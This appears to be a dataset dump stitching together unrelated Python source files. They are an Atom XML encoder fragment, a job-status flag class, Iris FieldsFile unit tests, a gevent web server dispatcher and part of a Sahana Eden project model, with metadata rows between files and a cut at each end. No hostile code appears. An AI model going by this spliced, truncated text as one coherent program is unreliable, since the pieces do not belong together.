operations_code = extract_p('code', d, None)
if operations_code is not None:
operation.set("code", operations_code)
http_method = extract_p('method', d, None)
if http_method is not None:
operation.set("method", http_method)
mimetype = extract_p('type', d, None)
if mimetype is not None:
operation.set("type", mimetype)
request_url = extract_p('href', d, None)
if request_url is not None:
operation.set("href", request_url)
# use axml_content here
request = extract_p('request', d, None)
request_enc = None if request is None else axml_content(request)
if request_enc is not None:
operation.append(request_enc)
# use axml_content here
result = extract_p('result', d, None)
result_enc = None if result is None else axml_content(result)
if result_enc is not None:
operation.append(result_enc)
return operation
except Exception as ex:
log.warn('could encode operation', ex)
return None
def axml_styleset(d):
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
if is_empty(d):
return None
else:
try:
styleset = etree.Element(ns_elem("owc", "styleSet"), nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(styleset, ns_elem("owc", "name")).text = name
title = extract_p('title', d, None)
if title is not None:
etree.SubElement(styleset, ns_elem("owc", "title")).text = title
subtitle = extract_p('abstract', d, None)
if subtitle is not None:
etree.SubElement(styleset, ns_elem("owc", "abstract")).text = subtitle
is_default = extract_p('default', d, None)
# TODO no example for default setting on style set
if is_default is not None:
etree.SubElement(styleset, ns_elem("owc", "default")).text = is_default
legend_url = extract_p('legendURL', d, None)
if legend_url is not None:
etree.SubElement(styleset, ns_elem("owc", "legendURL")).text = legend_url
# TODO no example for content on style set
content = extract_p('content', d, None)
content_enc = None if content is None else axml_content(content)
if content_enc is not None:
styleset.append(content_enc)
return styleset
except Exception as ex:
log.warn('could encode styleset', ex)
return None
def axml_content(d):
"""
OwcContent dict to Atom XML
:param d:
:return:
"""
# <owc:content type="image/tiff" href=".."
if is_empty(d):
return None
else:
try:
content_elem = etree.Element(ns_elem("owc", "content"), nsmap=ns)
mimetype = extract_p('type', d, None)
if mimetype is not None:
content_elem.set("type", mimetype)
url = extract_p('url', d, None)
if url is not None:
content_elem.set("href", url)
title = extract_p('title', d, None)
if title is not None:
content_elem.set("title", title)
content = extract_p('content', d, None)
if content is None:
content_elem.text = content
return content_elem
except Exception as ex:
log.warn('could encode content', ex)
return None
| bsd-3-clause | 4,384,036,189,799,634,400 | 35.935547 | 106 | 0.568188 | false | 3.644791 | true | false | false |
hep-cce/hpc-edge-service | balsam/job_sources/StatusMessage.py | 1 | 1185 | import logging
logger = logging.getLogger(__name__)
class StatusMessage:
NO_MESSAGE = 0x0
SUCCEEDED = 0x1 << 0
SUBMIT_DISABLED = 0x1 << 1
FAILED = 0x1 << 2
INVALID_EXE = 0x1 << 3
message_list = [
NO_MESSAGE,
SUCCEEDED,
SUBMIT_DISABLED,
FAILED,
INVALID_EXE,
]
message_text = {
NO_MESSAGE:'no message',
SUCCEEDED:'succeeded',
SUBMIT_DISABLED:'submission disabled',
FAILED:'failed',
INVALID_EXE:'invalid executable',
}
def __init__(self):
self.message = StatusMessage.NO_MESSAGE
def __str__(self):
out = []
for message in StatusMessage.message_list:
if message & self.message:
out.append(StatusMessage.message_text[message])
return str(out)
def contains(self,flag):
if flag in StatusMessage.message_list:
if self.message & flag:
return True
else:
logger.warning('Invalid Flag passed')
return False
| bsd-3-clause | 7,310,423,936,941,458,000 | 25.931818 | 59 | 0.497046 | false | 4.557692 | false | false | false |
kwilliams-mo/iris | lib/iris/tests/test_ff.py | 1 | 13197 | # (C) British Crown Copyright 2010 - 2013, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test the Fieldsfile file loading plugin and FFHeader.
"""
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import collections
import warnings
import mock
import numpy as np
import iris
import iris.fileformats.ff as ff
import iris.fileformats.pp as pp
_MockField = collections.namedtuple('_MockField',
'lbext,lblrec,lbnrec,lbpack,lbuser')
_MockLbpack = collections.namedtuple('_MockLbpack', 'n1')
# PP-field: LBPACK N1 values.
_UNPACKED = 0
_WGDOS = 1
_CRAY = 2
_GRIB = 3 # Not implemented.
_RLE = 4 # Not supported, deprecated FF format.
# PP-field: LBUSER(1) values.
_REAL = 1
_INTEGER = 2
_LOGICAL = 3 # Not implemented.
class TestFF_HEADER(tests.IrisTest):
def test_initialisation(self):
self.assertEqual(ff.FF_HEADER[0], ('data_set_format_version', (0,)))
self.assertEqual(ff.FF_HEADER[17], ('integer_constants', (99, 100)))
def test_size(self):
self.assertEqual(len(ff.FF_HEADER), 31)
@iris.tests.skip_data
class TestFFHeader(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff_header = ff.FFHeader(self.filename)
self.valid_headers = (
'integer_constants', 'real_constants', 'level_dependent_constants',
'lookup_table', 'data'
)
self.invalid_headers = (
'row_dependent_constants', 'column_dependent_constants',
'fields_of_constants', 'extra_constants', 'temp_historyfile',
'compressed_field_index1', 'compressed_field_index2',
'compressed_field_index3'
)
def test_constructor(self):
"""Test FieldsFile header attribute lookup."""
self.assertEqual(self.ff_header.data_set_format_version, 20)
self.assertEqual(self.ff_header.sub_model, 1)
self.assertEqual(self.ff_header.vert_coord_type, 5)
self.assertEqual(self.ff_header.horiz_grid_type, 0)
self.assertEqual(self.ff_header.dataset_type, 3)
self.assertEqual(self.ff_header.run_identifier, 0)
self.assertEqual(self.ff_header.experiment_number, -32768)
self.assertEqual(self.ff_header.calendar, 1)
self.assertEqual(self.ff_header.grid_staggering, 3)
self.assertEqual(self.ff_header.time_type, -32768)
self.assertEqual(self.ff_header.projection_number, -32768)
self.assertEqual(self.ff_header.model_version, 802)
self.assertEqual(self.ff_header.obs_file_type, -32768)
self.assertEqual(self.ff_header.last_fieldop_type, -32768)
self.assertEqual(self.ff_header.first_validity_time,
(2011, 7, 10, 18, 0, 0, 191))
self.assertEqual(self.ff_header.last_validity_time,
(2011, 7, 10, 21, 0, 0, 191))
self.assertEqual(self.ff_header.misc_validity_time,
(2012, 4, 30, 18, 12, 13, -32768))
self.assertEqual(self.ff_header.integer_constants.shape, (46, ))
self.assertEqual(self.ff_header.real_constants.shape, (38, ))
self.assertEqual(self.ff_header.level_dependent_constants.shape,
(71, 8))
self.assertIsNone(self.ff_header.row_dependent_constants)
self.assertIsNone(self.ff_header.column_dependent_constants)
self.assertIsNone(self.ff_header.fields_of_constants)
self.assertIsNone(self.ff_header.extra_constants)
self.assertIsNone(self.ff_header.temp_historyfile)
self.assertIsNone(self.ff_header.compressed_field_index1)
self.assertIsNone(self.ff_header.compressed_field_index2)
self.assertIsNone(self.ff_header.compressed_field_index3)
self.assertEqual(self.ff_header.lookup_table, (909, 64, 5))
self.assertEqual(self.ff_header.total_prognostic_fields, 3119)
self.assertEqual(self.ff_header.data, (2049, 2961, -32768))
def test_str(self):
self.assertString(str(self.ff_header), ('FF', 'ffheader.txt'))
def test_repr(self):
target = "FFHeader('" + self.filename + "')"
self.assertEqual(repr(self.ff_header), target)
def test_shape(self):
self.assertEqual(self.ff_header.shape('data'), (2961, -32768))
@iris.tests.skip_data
class TestFF2PP2Cube(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
def test_unit_pass_0(self):
"""Test FieldsFile to PPFields cube load."""
cube_by_name = collections.defaultdict(int)
cubes = iris.load(self.filename)
while cubes:
cube = cubes.pop(0)
standard_name = cube.standard_name
cube_by_name[standard_name] += 1
filename = '{}_{}.cml'.format(standard_name,
cube_by_name[standard_name])
self.assertCML(cube, ('FF', filename))
@iris.tests.skip_data
class TestFFieee32(tests.IrisTest):
def test_iris_loading(self):
ff32_fname = tests.get_data_path(('FF', 'n48_multi_field.ieee32'))
ff64_fname = tests.get_data_path(('FF', 'n48_multi_field'))
ff32_cubes = iris.load(ff32_fname)
ff64_cubes = iris.load(ff64_fname)
for ff32, ff64 in zip(ff32_cubes, ff64_cubes):
# load the data
_, _ = ff32.data, ff64.data
self.assertEqual(ff32, ff64)
@iris.tests.skip_data
class TestFFVariableResolutionGrid(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff2pp = ff.FF2PP(self.filename)
self.ff_header = self.ff2pp._ff_header
data_shape = (73, 96)
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[1])) * 5
lons = np.linspace(0, 180, data_shape[1]) + delta
lons = np.vstack([lons[:-1], lons[:-1] + 0.5 * np.diff(lons)]).T
lons = np.reshape(lons, lons.shape, order='F')
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[0])) * 5
lats = np.linspace(-90, 90, data_shape[0]) + delta
lats = np.vstack([lats[:-1], lats[:-1] + 0.5 * np.diff(lats)]).T
lats = np.reshape(lats, lats.shape, order='F')
self.ff_header.column_dependent_constants = lons
self.ff_header.row_dependent_constants = lats
self.U_grid_x = lons[:, 1]
self.V_grid_y = lats[:-1, 1]
self.P_grid_x = lons[:, 0]
self.P_grid_y = lats[:, 0]
self.orig_make_pp_field = pp.make_pp_field
def new_make_pp_field(header_values):
field = self.orig_make_pp_field(header_values)
field.stash = self.ff2pp._custom_stash
field.bdx = field.bdy = field.bmdi
return field
# Replace the pp module function with this new function;
# this gets called in PP2FF.
pp.make_pp_field = new_make_pp_field
def tearDown(self):
pp.make_pp_field = self.orig_make_pp_field
def _check_stash(self, stash, x_coord, y_coord):
self.ff2pp._custom_stash = stash
field = next(iter(self.ff2pp))
self.assertArrayEqual(x_coord, field.x, ('x_coord was incorrect for '
'stash {}'.format(stash)))
self.assertArrayEqual(y_coord, field.y, ('y_coord was incorrect for '
'stash {}'.format(stash)))
def test_p(self):
self._check_stash('m01s00i001', self.P_grid_x, self.P_grid_y)
def test_u(self):
self._check_stash('m01s00i002', self.U_grid_x, self.P_grid_y)
def test_v(self):
self._check_stash('m01s00i003', self.P_grid_x, self.V_grid_y)
def test_unhandled_grid_type(self):
with mock.patch('warnings.warn') as warn_fn:
self._check_stash('m01s00i005', self.P_grid_x, self.P_grid_y)
self.assertIn("Assuming the data is on a P grid.",
warn_fn.call_args[0][0])
class TestFFPayload(tests.IrisTest):
def _test_payload(self, mock_field, expected_depth, expected_type):
with mock.patch('iris.fileformats.ff.FFHeader') as mock_header:
mock_header.return_value = None
ff2pp = ff.FF2PP('Not real')
data_depth, data_type = ff2pp._payload(mock_field)
self.assertEqual(data_depth, expected_depth)
self.assertEqual(data_type, expected_type)
def test_payload_unpacked_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_unpacked_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 400, expected_type)
def test_payload_unpacked_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 1600, expected_type)
def test_payload_unpacked_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_wgdos_real(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_integer(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_wgdos_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 200, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 800, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
if __name__ == '__main__':
tests.main()
| gpl-3.0 | 346,667,395,340,066,240 | 40.369906 | 79 | 0.600364 | false | 3.379513 | true | false | false |
eavatar/ava-srv | src/eavatar.ava/ava/core/webfront.py | 1 | 3774 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
import gevent
import bottle
from gevent import pywsgi
from ava.runtime import config
from ava.runtime import environ
logger = logging.getLogger(__name__)
_CONF_SECTION = 'webfront'
class ApplicationDispatcher(object):
"""Allows one to mount middlewares or applications in a WSGI application.
"""
def __init__(self, app, mounts=None):
self.app = app
self.mounts = mounts or {}
def __call__(self, environ, start_response):
script = environ.get(b'PATH_INFO', b'')
path_info = ''
while b'/' in script:
if script in self.mounts:
app = self.mounts[script]
break
script, last_item = script.rsplit(b'/', 1)
path_info = b'/%s%s' % (last_item, path_info)
else:
app = self.mounts.get(script, self.app)
original_script_name = environ.get(b'SCRIPT_NAME', b'')
environ[b'SCRIPT_NAME'] = original_script_name + script
environ[b'PATH_INFO'] = path_info
return app(environ, start_response)
def attach_app(self, path, app):
self.mounts[path] = app
def detach_app(self, path):
app = self.mounts.get(path)
if app is not None:
del self.mounts[path]
# the global web application
dispatcher = ApplicationDispatcher(bottle.app())
class WebfrontEngine(object):
"""
The client-facing web interface.
"""
def __init__(self):
logger.debug("Initializing webfront engine...")
self._http_listener = None
self._https_listener = None
self.listen_port = 5000
self.listen_addr = '127.0.0.1'
self.secure_listen_port = 0 # o means not binding
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
def start(self, ctx=None):
logger.debug("Starting webfront engine...")
self.listen_port = config.agent().getint(_CONF_SECTION, 'listen_port')
self.listen_addr = config.agent().get(_CONF_SECTION, 'listen_addr')
self.secure_listen_port = config.agent().getint(_CONF_SECTION, 'secure_listen_port')
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
logger.debug("Local base URL:%s", self.local_base_url)
if self.listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_http))
if self.secure_listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_https))
logger.debug("Webfront engine started.")
def stop(self, ctx=None):
logger.debug("Webfront engine stopped.")
def _run_https(self):
logger.debug("Webfront engine(HTTPS) is running...")
conf_dir = environ.conf_dir()
keyfile = os.path.join(conf_dir, 'ava.key')
certfile = os.path.join(conf_dir, 'ava.crt')
self._https_listener = pywsgi.WSGIServer((self.listen_addr, self.secure_listen_port),
dispatcher,
keyfile=keyfile,
certfile=certfile)
logger.debug("Webfront engine(HTTPS) is listening on port: %d", self._https_listener.address[1])
self._https_listener.serve_forever()
def _run_http(self):
logger.debug("Webfront engine(HTTP) is running...")
self._http_listener = pywsgi.WSGIServer((self.listen_addr, self.listen_port),
dispatcher)
logger.debug("Webfront engine(HTTP) is listening on port: %d", self._http_listener.address[1])
self._http_listener.serve_forever()
| bsd-3-clause | 6,369,926,576,584,644,000 | 32.39823 | 104 | 0.590885 | false | 3.812121 | false | false | false |
flavour/tldrmp | modules/s3db/project.py | 2 | 259927 | # *- coding: utf-8 -*-
""" Sahana Eden Project Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ProjectModel",
"S3ProjectActivityModel",
"S3ProjectActivityTypeModel",
"S3ProjectActivityOrganisationModel",
"S3ProjectAnnualBudgetModel",
"S3ProjectBeneficiaryModel",
"S3ProjectCampaignModel",
"S3ProjectFrameworkModel",
"S3ProjectHazardModel",
"S3ProjectLocationModel",
"S3ProjectOrganisationModel",
"S3ProjectOutputModel",
"S3ProjectSectorModel",
"S3ProjectThemeModel",
"S3ProjectDRRModel",
"S3ProjectDRRPPModel",
"S3ProjectTaskModel",
"S3ProjectTaskHRMModel",
"S3ProjectTaskIReportModel",
"project_rheader",
"project_task_form_inject",
"project_task_controller",
]
import datetime
try:
import json # try stdlib (Python 2.6)
except ImportError:
try:
import simplejson as json # try external module
except:
import gluon.contrib.simplejson as json # fallback to pure-Python module
try:
# Python 2.7
from collections import OrderedDict
except:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3ProjectModel(S3Model):
"""
Project Model
Note: This module can be extended by 2 different modes:
- '3w': "Who's doing What Where"
suitable for use by multinational organisations tracking
projects at a high level
- sub-mode 'drr': Disaster Risk Reduction extensions
- 'task': Suitable for use by a smaller organsiation tracking tasks
within projects
There are also a number of other deployment_settings to control behaviour
This class contains the tables common to all uses
There are additional tables in other Models
"""
names = ["project_status",
"project_project",
"project_project_id",
"project_project_represent",
"project_human_resource",
"project_hfa_opts",
"project_jnap_opts",
"project_pifacc_opts",
"project_rfa_opts",
"project_theme_opts",
"project_theme_helps",
"project_hazard_opts",
"project_hazard_helps",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
NONE = current.messages["NONE"]
human_resource_id = self.hrm_human_resource_id
settings = current.deployment_settings
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
mode_drr = settings.get_project_mode_drr()
use_codes = settings.get_project_codes()
use_sectors = settings.get_project_sectors()
multi_budgets = settings.get_project_multiple_budgets()
multi_orgs = settings.get_project_multiple_organisations()
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
set_method = self.set_method
# ---------------------------------------------------------------------
# Project Statuses
#
tablename = "project_status"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True,
label=T("Name")),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_STATUS = T("Add Status")
crud_strings[tablename] = Storage(
title_create = ADD_STATUS,
title_display = T("Status Details"),
title_list = T("Statuses"),
title_update = T("Edit Status"),
#title_upload = T("Import Statuses"),
subtitle_create = T("Add New Status"),
label_list_button = T("List Statuses"),
label_create_button = ADD_STATUS,
label_delete_button = T("Delete Status"),
msg_record_created = T("Status added"),
msg_record_modified = T("Status updated"),
msg_record_deleted = T("Status deleted"),
msg_list_empty = T("No Statuses currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
#none = T("Unknown"))
status_id = S3ReusableField("status_id", table,
label = T("Status"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_status.id",
represent,
sort=True)),
represent = represent,
comment = S3AddResourceLink(title=ADD_STATUS,
c="project",
f="status"),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Projects
#
LEAD_ROLE = settings.get_project_organisation_lead_role()
org_label = settings.get_project_organisation_roles()[LEAD_ROLE]
tablename = "project_project"
table = define_table(tablename,
self.super_link("doc_id", "doc_entity"),
# multi_orgs deployments use the separate project_organisation table
# - although Lead Org is still cached here to avoid the need for a virtual field to lookup
self.org_organisation_id(
label = org_label,
default = auth.root_org(),
requires = self.org_organisation_requires(
required = True,
# Only allowed to add Projects for Orgs that the user has write access to
updateable = True,
),
),
Field("name", unique=True, length=255,
label = T("Project Name"),
# Require unique=True if using IS_NOT_ONE_OF like here (same table,
# no filter) in order to allow both automatic indexing (faster)
# and key-based de-duplication (i.e. before field validation)
requires = [IS_NOT_EMPTY(error_message=T("Please fill this!")),
IS_NOT_ONE_OF(db, "project_project.name")]
),
Field("code",
label = T("Short Title / ID"),
readable = use_codes,
writable = use_codes,
),
Field("description", "text",
label = T("Description")),
status_id(),
# NB There is additional client-side validation for start/end date in the Controller
s3_date("start_date",
label = T("Start Date")
),
s3_date("end_date",
label = T("End Date")
),
# Free-text field with no validation (used by OCHA template currently)
Field("duration",
label = T("Duration"),
readable=False,
writable=False,
),
Field("calendar",
label = T("Calendar"),
readable = mode_task,
writable = mode_task,
requires = IS_NULL_OR(IS_URL()),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Calendar"),
T("URL to a Google Calendar to display on the project timeline.")))),
# multi_budgets deployments handle on the Budgets Tab
Field("budget", "double",
readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
label = T("Budget"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2)),
s3_currency(readable = False if multi_budgets else True,
writable = False if multi_budgets else True,
),
Field("objectives", "text",
readable = mode_3w,
writable = mode_3w,
represent = lambda v: v or NONE,
label = T("Objectives")),
human_resource_id(label=T("Contact Person")),
s3_comments(comment=DIV(_class="tooltip",
_title="%s|%s" % (T("Comments"),
T("Outcomes, Impact, Challenges")))),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECT = T("Add Project")
crud_strings[tablename] = Storage(
title_create = ADD_PROJECT,
title_display = T("Project Details"),
title_list = T("Projects"),
title_update = T("Edit Project"),
title_search = T("Search Projects"),
title_report = T("Project Report"),
title_upload = T("Import Projects"),
subtitle_create = T("Add New Project"),
label_list_button = T("List Projects"),
label_create_button = ADD_PROJECT,
label_delete_button = T("Delete Project"),
msg_record_created = T("Project added"),
msg_record_modified = T("Project updated"),
msg_record_deleted = T("Project deleted"),
msg_list_empty = T("No Projects currently registered"))
# Search Method
status_search_widget = S3SearchOptionsWidget(
name = "project_search_status",
label = T("Status"),
field = "status_id",
cols = 4,
)
simple = [
S3SearchSimpleWidget(name = "project_search_text_advanced",
label = T("Description"),
comment = T("Search for a Project by name, code, or description."),
field = ["name",
"code",
"description",
]
),
status_search_widget,
]
advanced = list(simple)
append = advanced.append
append(S3SearchOptionsWidget(
name = "project_search_organisation_id",
label = org_label,
field = "organisation_id",
cols = 3
))
append(S3SearchOptionsWidget(
name = "project_search_L0",
field = "location.location_id$L0",
location_level="L0",
cols = 3
))
append(S3SearchOptionsWidget(
name = "project_search_L1",
field = "location.location_id$L1",
location_level="L1",
cols = 3
))
#append(S3SearchOptionsWidget(
# name = "project_search_L2",
# label = T("Countries"),
# field = "location.location_id$L2",
# location_level="L2",
# cols = 3
# ))
if use_sectors:
if settings.get_ui_label_cluster():
sector = T("Cluster")
else:
sector = T("Sector")
append(S3SearchOptionsWidget(
name = "project_search_sector",
label = sector,
field = "sector.id",
options = self.org_sector_opts,
cols = 4
))
if mode_drr:
append(S3SearchOptionsWidget(
name = "project_search_hazard",
label = T("Hazard"),
field = "hazard.id",
options = self.project_hazard_opts,
help_field = self.project_hazard_helps,
cols = 4
))
if mode_3w:
append(S3SearchOptionsWidget(
name = "project_search_theme",
label = T("Theme"),
field = "theme.id",
options = self.project_theme_opts,
help_field = self.project_theme_helps,
cols = 4
))
if mode_drr:
project_hfa_opts = self.project_hfa_opts()
options = {}
#options = {None:NONE} To search NO HFA
for key in project_hfa_opts.keys():
options[key] = "HFA %s" % key
append(S3SearchOptionsWidget(
name = "project_search_hfa",
label = T("HFA"),
field = "drr.hfa",
options = options,
help_field = project_hfa_opts,
cols = 5
))
if multi_orgs:
append(S3SearchOptionsWidget(
name = "project_search_partners",
field = "partner.organisation_id",
label = T("Partners"),
cols = 3,
))
append(S3SearchOptionsWidget(
name = "project_search_donors",
field = "donor.organisation_id",
label = T("Donors"),
cols = 3,
))
project_search = S3Search(simple = simple,
advanced = advanced)
# Resource Configuration
if settings.get_project_theme_percentages():
create_next = URL(c="project", f="project",
args=["[id]", "theme"])
elif mode_task:
if settings.get_project_milestones():
create_next = URL(c="project", f="project",
args=["[id]", "milestone"])
else:
create_next = URL(c="project", f="project",
args=["[id]", "task"])
else:
# Default
create_next = None
list_fields = ["id"]
append = list_fields.append
if use_codes:
append("code")
append("name")
append("organisation_id")
if mode_3w:
append((T("Locations"), "location.location_id"))
if use_sectors:
append((T("Sectors"), "sector.name"))
if mode_drr:
append((T("Hazards"), "hazard.name"))
#append("drr.hfa")
append((T("Themes"), "theme.name"))
if multi_orgs:
table.total_organisation_amount = Field.Lazy(self.project_total_organisation_amount)
append((T("Total Funding Amount"), "total_organisation_amount"))
if multi_budgets:
table.total_annual_budget = Field.Lazy(self.project_total_annual_budget)
append((T("Total Annual Budget"), "total_annual_budget"))
append("start_date")
append("end_date")
report_fields = list_fields
report_col_default = "location.location_id"
report_fact_fields = [(field, "count") for field in report_fields]
report_fact_default = "project.organisation_id"
#report_fact_default = "theme.name"
configure(tablename,
super_entity="doc_entity",
deduplicate=self.project_project_deduplicate,
onaccept=self.project_project_onaccept,
create_next=create_next,
search_method=project_search,
list_fields=list_fields,
report_options=Storage(
search = [status_search_widget] + advanced,
rows=report_fields,
cols=report_fields,
fact=report_fact_fields,
defaults=Storage(
rows="hazard.name",
cols=report_col_default,
fact=report_fact_default,
aggregate="count",
totals=True
)
),
context = {"location": "location.location_id",
"organisation": "organisation_id",
},
realm_components = ["human_resource",
"task",
"organisation",
"activity",
"activity_type",
"annual_budget",
"beneficiary",
"location",
"milestone",
"theme_percentage",
"document",
"image",
],
update_realm=True,
)
# Reusable Field
if use_codes:
project_represent = S3Represent(lookup=tablename,
field_sep = ": ",
fields=["code", "name"])
else:
project_represent = S3Represent(lookup=tablename)
project_id = S3ReusableField("project_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db(auth.s3_accessible_query("update",
table)),
"project_project.id",
project_represent)),
represent = project_represent,
comment = S3AddResourceLink(c="project", f="project",
tooltip=T("If you don't see the project in the list, you can add a new one by clicking link 'Add Project'.")),
label = T("Project"),
ondelete = "CASCADE"
)
# Custom Methods
set_method("project", "project",
method="timeline",
action=self.project_timeline)
set_method("project", "project",
method="map",
action=self.project_map)
# Components
if multi_orgs:
# Organisations
add_component("project_organisation", project_project="project_id")
# Donors
add_component("project_organisation",
project_project=dict(
name="donor",
joinby="project_id",
filterby="role",
filterfor=[3], # Works for IFRC & DRRPP
))
# Partners
add_component("project_organisation",
project_project=dict(
name="partner",
joinby="project_id",
filterby="role",
filterfor=[2, 9], # Works for IFRC & DRRPP
))
# Sites
#add_component("project_site", project_project="project_id")
# Activities
add_component("project_activity", project_project="project_id")
# Activity Types
add_component("project_activity_type",
project_project=dict(link="project_activity_type_project",
joinby="project_id",
key="activity_type_id",
actuate="link"))
# Milestones
add_component("project_milestone", project_project="project_id")
# Outputs
add_component("project_output", project_project="project_id")
# Tasks
add_component("project_task",
project_project=dict(link="project_task_project",
joinby="project_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Annual Budgets
add_component("project_annual_budget", project_project="project_id")
# Beneficiaries
add_component("project_beneficiary", project_project="project_id")
# Hazards
add_component("project_hazard",
project_project=dict(link="project_hazard_project",
joinby="project_id",
key="hazard_id",
actuate="hide"))
# Human Resources
add_component("project_human_resource", project_project="project_id")
# Locations
add_component("project_location", project_project="project_id")
# Sectors
